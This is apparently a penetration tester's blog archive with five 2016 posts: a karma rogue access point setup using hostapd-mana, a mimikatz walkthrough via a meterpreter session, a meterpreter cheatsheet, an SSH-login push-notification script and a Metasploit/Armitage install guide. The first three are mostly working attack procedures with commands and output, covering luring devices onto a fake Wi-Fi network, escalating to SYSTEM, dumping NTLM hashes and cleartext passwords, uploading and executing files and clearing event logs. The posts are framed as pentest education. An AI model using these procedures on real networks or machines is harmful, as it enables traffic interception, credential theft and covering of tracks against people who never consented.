12 Sep 2016, 19:09

Wireless Tricks

Wireless has been a great benefit to everyone, to the person drink coffee at their local coffee shop or the salesperson checking their emails. Security was an afterthought in the original design of 802.11 standards and thus lead to hackers being able to see and steal other individuals traffic.

In this post I will partially demonstrate how an average Joe can setup their wireless to either:

  • Sniff data (Man-in-the-Middle)
  • Steal your personal Active Directory password (NetNTLMv2)
  • Inject malicious code.

The above-mentioned list could be indefinite, as the hacker would have full control over a victim’s traffic going back and forth.

Lets start with a simple one, namely the Karma Attack.

Karma Attack

The concept of a karma attack is pretty simple, let’s take a look at the below diagram:

                                    Normal Probe Request


                             Probe Request: My Home Wifi
    Broadcasts probes        Probe Request: Work Wifi               Listens for probes
    +------------------+     Probe Request: Coffeshop Wifi         +-------------------+
    |                  +------------------------------------------->        Home       |
    |  Phone / Laptop  |                                           |  Wireless Router  |
    |                  <-------------------------------------------+                   |
    +------------------+      Probe Response: My Home Wifi         +-------------------+
    Listens for beacons       Beacon:         My Home Wifi          Broadcasts beacons

In the above-mentioned diagram, a user’s phone/laptop at home will continuously probe for access points, which the user has previously connected to, namely:

Probe Request: My Home Wifi
Probe Request: Work Wifi
Probe Request: Coffeshop Wifi

The wireless router at the home, will receive the probe request My Home Wifi and say "Hello, I'm here!".

This is where the initial handshake / DHCP lease etc. takes place, and the user will be connected to their home network.

An attacker could take advantage of this design, take the following diagram into consideration:

                     Probe Request: My Home Wifi
 Broadcasts probes   Probe Request: Work Wifi        Listens for probes                Listens for probes
+------------------+ Probe Request: Coffeshop Wifi +---------------------+           +-------------------+
|                  +------------------------------->                     +----------->    Coffee shop    |
|  Phone / Laptop  |                               |  Hacker's Karma AP  |  Traffic  |  Wireless Router  |
|                  <-------------------------------+                     <-----------+                   |
+------------------+ Probe Response: My Home Wifi  +---------------------+           +-------------------+
 Listens for beacons Beacon:         My Home Wifi    Broadcasts Beackins               Broadcasts Beackins

Let’s say, a user is sitting at a local coffee shop. Mr hacker had set up a karma access point in this coffee shop. What this means is, the user’s device will now probe for the access points stored on his device.

The attacker’s access point will respond on either of those requests, and make the user’s device connect thinking that it is actually the legitimate access point, and in the above-mentioned case, the user (at the local coffee shop) connected to their My Home Wifi

The attacker could now forward all the user’s traffic via the coffee shop network while having full access to the user’s traffic.

Karma Setup

The Gear

  • TP-LINK TL-WN722N
  • Alpha ARS-N19 omni directional 9 dBi antenna
  • Kali VM

Let’s set up our own karma access point, I will make use of the Sensepost MANA toolkit for this (Thanks to Sensepost for this repo):

git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana/hostapd && make

The above commands will clone the hostapd-mana git repository, and compile the hostapd executable for you.

Once this is done, it is time to set up the wireless adapter on the Kali Virtual Machine.

Insert your wireless adapter and type the following in your terminal:

iwconfig

This should print out your currently active wireless interfaces, below is an example of what it could look like:

[root@kali]$ iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0 is my TP-Link adapter, which I will be using for this attack, yours might be wlan1 etc, just remember the interface name.

Next we need to put the wlan0 interface into monitor mode, with the following commands:

airmon-ng check kill
airmon-ng start wlan0

This will create a new interface, that is in monitor state, to verify we can run iwconfig again.

[root@kali]$ iwconfig
wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

As you can see, my wireless interface name has changed to wlan0mon, don’t be alarmed if yours is something like mon0.

Copy the name of the wireless interface, and open the config file called hostapd.config with your prefered text editor, and make the following changes:

  • Change the following line: interface=wlan0 to interface=wlan0mon obviously with the interface name you have copied.
  • Change the ssid=test (Line: 111) to a more desired, I will make mine ssid=Free Wifi

Running hostapd

Type the following to start the karma attack:

./hostapd hostapd.conf

Sample output could be as follows:

[root@kali]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED

As you can see, we now have an access point broadcasting the ssid name Free Wifi, but whenever a probe request from a victim is received, hostapd will respond to that probe request so that a victim could connect to our access point.

The below output shows a successful connection to our karma access point:

[root@winter hostapd (master ✗)]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: authenticated
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: associated (aid 1)
wlan0mon: AP-STA-CONNECTED 6c:72:e7:98:9e:22
MANA - Successful association of 6c:72:e7:98:9e:22 to ESSID 'My Home Wifi'

04 Sep 2016, 21:31

mimikatz cheatsheet

Let’s talk about mimikatz, I had the pleasure to play with this tool in a few penetration tests, and it’s been VERY useful. Mimikatz has been designed with the focus of getting LM & NTLM hashes with the added benefit of seeing passwords in cleartext sitting in memory in addition to more functions.

I have created a demo using a Win7 x86 to show you how it works. The username is dev with password password .

Our demo makes use of a Metasploit installation in a Docker container (thanks remnux) where the multi\handler is running.

Lets begin.

Getting a shell has been taken care of for us with psexec

msf exploit(handler) > 
[*] Sending stage (957999 bytes) to 10.0.0.114
[*] Meterpreter session 1 opened (172.17.0.2:2222 -> 10.0.0.114:49417) at 2016-09-04 19:20:27 +0000

msf exploit(handler) >

Done, now we have a session to play with. Let’s make sure we have only one session.

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x86/win32  dev-PC\dev @ DEV-PC  172.17.0.2:2222 -> 10.0.0.114:49417 (10.0.0.114)

msf exploit(handler) >

Now we jump into that session, with the below example.

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

The most important thing about mimikatz is the ability to extract the passwords in any form you like, however this can only be done when you are running meterpreter as SYSTEM. In the below example you will see that we are running as the user that was logged onto the system dev. This will not do.

meterpreter > getuid
Server username: dev-PC\dev
meterpreter > 

As I mentioned above, we need to be SYSTEM in order to do what we want to explain in this demo. So let’s execute a native meterpreter command to migrate the meterpreter service from the user account to a SYSTEM account. After getting system you can run getuid again to make sure we have the SYSTEM account.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now that we have the most important step completed we can go ahead an recon the system for fun before we grab all the creds.

meterpreter > sysinfo
Computer        : DEV-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

From here we can load mimikatz which will be the module of focus in this post.

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

After loading mimikatz, we load the help file to make sure it’s listening to us.

meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter >

If you wanted to check the version of mimikatz for some reason, you can do that by using the mimikatz_command.

meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Jul 11 2016 21:35:47)
meterpreter >

Reading hashes and password from memory can be done in two ways

You can use both the mimikatz builtin commands and the mimikatz crafted commands to extract passwords from memory. Lets look at the builtin native method first.

Lets dump the NTLM/LM hashes using the builtin meterpreter method.

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;103437  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;103396  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     DEV-PC$        n.s. (Credentials KO)
0;22584   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     DEV-PC$        n.s. (Credentials KO)

meterpreter >

Now using the builtin method to extract cleartext passwords from memory. You will see the password for user dev is password as I explained at the beginning.

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     DEV-PC$        
0;22584   NTLM                                    
0;999     NTLM       WORKGROUP     DEV-PC$        
0;103437  NTLM       dev-PC        dev            password
0;103396  NTLM       dev-PC        dev            password

meterpreter >

Now let’s look at the mimikatz crafted commands to do the same thing.

Lets dump the hashs with mimikatz_command -f samdump::hashes.

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : dev-PC
BootKey    : d20b4e2698ac8389dd909b1b389ab826

Rid  : 500
User : Administrator
LM   : 
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   : 
NTLM : 

Rid  : 1001
User : dev
LM   : 
NTLM : 8846f7eaee8fb117ad06bdd830b7586c

Rid  : 1002
User : HomeGroupUser$
LM   : 
NTLM : 022fff2ba68fb20d5a32145c43912fa0
meterpreter > 

And naturally we can extract the passwords saved in memory too using mimikatz_command -f sekurlsa::searchPasswords. Here again we can see that user dev password is password.

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { dev ; dev-PC ; password }
[1] { dev ; dev-PC ; password }
[2] { dev-PC ; dev ; password }
[3] { dev-PC ; dev ; password }
[4] { dev ; dev-PC ; password }
[5] { dev ; dev-PC ; password }
meterpreter >

Another useful command in the mimikatz bag is something called services. Using this command you can list/start/stop and remove windows services.

meterpreter > mimikatz_command -f service::
Module : 'service' identifi�, mais commande '' introuvable

Description du module : Manipulation des services
        list	- Liste les services et pilotes
       start	- D�marre un service ou pilote
        stop	- Arr�te un service ou pilote
      remove	- Supprime un service ou pilote
    mimikatz	- Installe et/ou d�marre le pilote mimikatz
meterpreter > 

meterpreter > mimikatz_command -f service::list
	KERNEL_DRIVER	STOPPED	1394ohci	1394 OHCI Compliant Host Controller
	KERNEL_DRIVER	RUNNING	ACPI	Microsoft ACPI Driver
	KERNEL_DRIVER	STOPPED	AcpiPmi	ACPI Power Meter Driver
 3568	WIN32_OWN_PROCESS	RUNNING	AdobeARMservice	Adobe Acrobat Update Service
	KERNEL_DRIVER	STOPPED	adp94xx	adp94xx
	KERNEL_DRIVER	STOPPED	adpahci	adpahci
	KERNEL_DRIVER	STOPPED	adpu320	adpu320
	WIN32_SHARE_PROCESS	STOPPED	AeLookupSvc	Application Experience
	KERNEL_DRIVER	RUNNING	AFD	Ancillary Function Driver for Winsock
	KERNEL_DRIVER	STOPPED	agp440	Intel AGP Bus Filter
	KERNEL_DRIVER	STOPPED	aic78xx	aic78xx
	WIN32_OWN_PROCESS	STOPPED	ALG	Application Layer Gateway Service
	KERNEL_DRIVER	STOPPED	aliide	aliide
	KERNEL_DRIVER	STOPPED	amdagp	AMD AGP Bus Filter Driver
	KERNEL_DRIVER	STOPPED	amdide	amdide
	KERNEL_DRIVER	STOPPED	AmdK8	AMD K8 Processor Driver
	KERNEL_DRIVER	STOPPED	AmdPPM	AMD Processor Driver
	KERNEL_DRIVER	STOPPED	amdsata	amdsata
	KERNEL_DRIVER	STOPPED	amdsbs	amdsbs
	KERNEL_DRIVER	RUNNING	amdxata	amdxata
	KERNEL_DRIVER	STOPPED	AppID	AppID Driver
	WIN32_SHARE_PROCESS	STOPPED	AppIDSvc	Application Identity
 1284	WIN32_SHARE_PROCESS	RUNNING	Appinfo	Application Information
	WIN32_SHARE_PROCESS	STOPPED	AppMgmt	Application Management
	KERNEL_DRIVER	STOPPED	arc	arc
	KERNEL_DRIVER	STOPPED	arcsas	arcsas
	KERNEL_DRIVER	STOPPED	AsyncMac	RAS Asynchronous Media Driver
	KERNEL_DRIVER	RUNNING	atapi	IDE Channel
 1256	WIN32_SHARE_PROCESS	RUNNING	AudioEndpointBuilder	Windows Audio Endpoint Builder
 1224	WIN32_SHARE_PROCESS	RUNNING	Audiosrv	Windows Audio
	WIN32_SHARE_PROCESS	STOPPED	AxInstSV	ActiveX Installer (AxInstSV)
	KERNEL_DRIVER	STOPPED	b06bdrv	Broadcom NetXtreme II VBD
<snip><snip><snip><snip><snip>
meterpreter >

You might think that having the ability to play with services would give you a little more power, and you are 100% correct. With mimikatz you have the ability to extract crypto certificates too (amongst other things) using the crypto command in mimikatz. See below.

meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identifi�, mais commande '' introuvable

Description du module : Cryptographie et certificats
listProviders	- Liste les providers install�s)
  listStores	- Liste les magasins syst�me
listCertificates	- Liste les certificats
    listKeys	- Liste les conteneurs de cl�s
exportCertificates	- Exporte les certificats
  exportKeys	- Exporte les cl�s
    patchcng	- [experimental] Patch le gestionnaire de cl�s pour l'export de cl�s non exportable
   patchcapi	- [experimental] Patch la CryptoAPI courante pour l'export de cl�s non exportable
meterpreter > 

meterpreter > mimikatz_command -f crypto::listProviders
Providers CryptoAPI :
	Microsoft Base Cryptographic Provider v1.0
	Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Base DSS Cryptographic Provider
	Microsoft Base Smart Card Crypto Provider
	Microsoft DH SChannel Cryptographic Provider
	Microsoft Enhanced Cryptographic Provider v1.0
	Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Enhanced RSA and AES Cryptographic Provider
	Microsoft RSA SChannel Cryptographic Provider
	Microsoft Strong Cryptographic Provider

Providers CNG :
	Microsoft Primitive Provider
	Microsoft Smart Card Key Storage Provider
	Microsoft Software Key Storage Provider
	Microsoft SSL Protocol Provider
meterpreter >

remember, don’t harm anyone with this knowledge.

stay tuned for more fun.

…the end.

29 Aug 2016, 16:22

meterpreter cheatsheet

Useful commands in Metasploit when spawning meterpreter shells.

uploading a file to a windows host

meterpreter > upload evil_file.exe c:\\windows\\system32
[*] uploading  : evil_file.exe -> c:\windows\system32
[*] uploaded   : evil_file.exe -> c:\windows\system32\evil_file.exe
meterpreter >

downloading a file from a windows host

meterpreter> download c:\\windows\\repair\\sam /tmp

executing uploaded executable on windows target

meterpreter> execute -f c:\\windows\temp\exploit.exe

creatnig a new channel with cmd.exe

meterpreter> execute -f cmd -c

show running processes

meterpreter> ps

open a shell inside a meterpreter session

meterpreter> shell

meterpreter automatic system priviledges

meterpreter> getsystem

meterpreter automatic hash dump attempt

meterpreter> hashdump

meterpreter create port forward to another target host

meterpreter> portfwd add –l 80 –p 80 –r <target>

meterpreter> portfwd delete –l 80 –p 80 –r <target>

push meterpreter session to background

meterpreter> background

read text files

meterpreter> cat file.txt

list current working directory on remote host

meterpreter> pwd

c:\windows

clear event logs on remote system (clears Application, System and Security event logs)

meterpreter> clearev

getting the current user that meterpreter is running as

meterpreter> getuid

idle time of a system

meterpreter > idletime
User has been idle for: 2 hours 14 mins 5 secs
meterpreter >

looking at network information

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

INTEL PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0dc:21:11:f1:11
IP Address  : 192.168.0.1
Netmask     : 255.255.255.0

meterpreter >

29 Aug 2016, 16:22

ssh login push event

Let’s set up a Push Notification Service for each login that successfully happens over SSH. Most mobile apps on phones use push notifications these days for their notifications, and I think getting a push notification on your phone when someone logs into your server is rather handy and neat.

Today we get some free to use push notification services on the net such as PushBullet, they have an App you can download too and a browser extension, which we will do later in the guide. The main requirement for a good push service is that you want them to provide you with an API interface that you can call.

Here’s what we’re going to do. Assume I have a standard Ubuntu Server, let’s say 16.04 LTS.

What’s required?:


  1. Server: A Linux server would be handy, you can test this on a Linux VM too if you want to try it first, the only requirement is internet access.
  2. Push Service: For this guide, I will use PushBullet. They are stable and fast! Register an account with the service you end up choosing.
  3. Mobile App: I will download the PushBullet App on my mobile phone, you can also install the browser extension.
  4. Register Devices: In PushBullet, once you have a registered account, go ahead and register a device on the account, like a mobile phone using the App or a browser using the browser extensions they provide.
  5. Generate Access Token: Login to your PushBullet portal and select “Settings”, then on the “Account” page you want to add an Access Token this is something we will use to query the API with.
  6. Script: We will develop a script that pulls a few environment variables into a cURL request that polls the API to send the Push Notification.
  7. Login Trigger: We will place the script we developed into the /etc/profile file, this will execute the script once the shell loads for any user that logs in.

Now we create a shell script on the Linux server, lets call it ssh_notify.sh and place it somewhere “hidden” like /usr/bin/.scripts/ssh_notify.sh … Just to make it less obvious in case of a breach I place it in a hidden folder (indicated by the “.” infront of my folder name).

Script Content.


  1. Replace ACCESS_TOKEN_HERE with your Access Token generated on the site.
  2. Replace TITLE_HERE with the title you want displayed on your push notification.
  3. You might need to tweak the variables a little depending on your system and output of your environment variables.
#/bin/bash
#Variables
LocalIPaddress=$(echo $SSH_CONNECTION | awk '{ print $1 }')
RemoteIPaddress=$(echo $SSH_CONNECTION | awk '{ print $3 }')
Username=$(echo $USER | awk '{ print $1 }')
NOW=$(date +"%Y %m %d %T")
Body=$(echo $USER' logged into '$RemoteIPaddress' from '$LocalIPaddress' at '$NOW)
curl -s --header 'Access-Token: ACCESS_TOKEN_HERE' -X POST https://api.pushbullet.com/v2/pushes --header 'Content-Type: application/json' --data-binary '{"type": "note", "title": "TITLE_HERE", "body": "'$USER' login from '$LocalIPaddress'"}' > /dev/null

You can test this script by running it using

root@server:#./ssh_notify.sh 
.You should get a Push notification on your phone with the user name that logged in and the IP address.

Now, we need a mechanism to trigger that script when someone successfully logged in, for this we are going to use the

/etc/profile file 
, we don’t want to see any failed login attempts.

Edit the /etc/profile file and add the location of the script at the bottom (like below example).

/usr/bin/.scripts/ssh_notify.sh

Now you can logout and log back in to test.

NOTE: Remember that you are sending a push notification to the devices in the default group specified in the Pushbullet Account. So you can add multiple devices in there to be notified of logins, handy when more than one person needs to be notified.

06 Jul 2016, 16:22

installing armitage teamserver

I’m not going to bore you with a write-up on how I struggled to install Metasploit and Armitage on a Ubuntu Server.

here we go.

Install dependencies:

sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

This will make sure we can build everything properly.

Ruby:

(Don’t go RVM, there’s an issue with symlink not being created and some crap like that, instead I’m going to show you the ‘rbenv’ method)

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo

exec $SHELL

rbenv install 2.3.1
rbenv global 2.3.1
ruby -v

Installing NMAP from source:

Because source is always fun!

mkdir ~/Development
cd ~/Development
svn co https://svn.nmap.org/nmap
cd nmap
./configure
make
sudo make install
make clean

Config PostgresSQL:

sudo -s
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit

Now let’s install Metasploit:

cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
sudo chown -R `whoami` /opt/metasploit-framework
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

Installing Armitage:

curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

Create the database file for Metasploit:

sudo nano /opt/metasploit-framework/config/database.yml

In the database.yml file, let’s paste the below as is:

production:
 adapter: postgresql
 database: msf
 username: msf
 password: msf
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

Lastly, remember to create the environment variable to show Metasploit and Armitage where your database config file is.

sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile

Now you may run your Metasploit for the first time.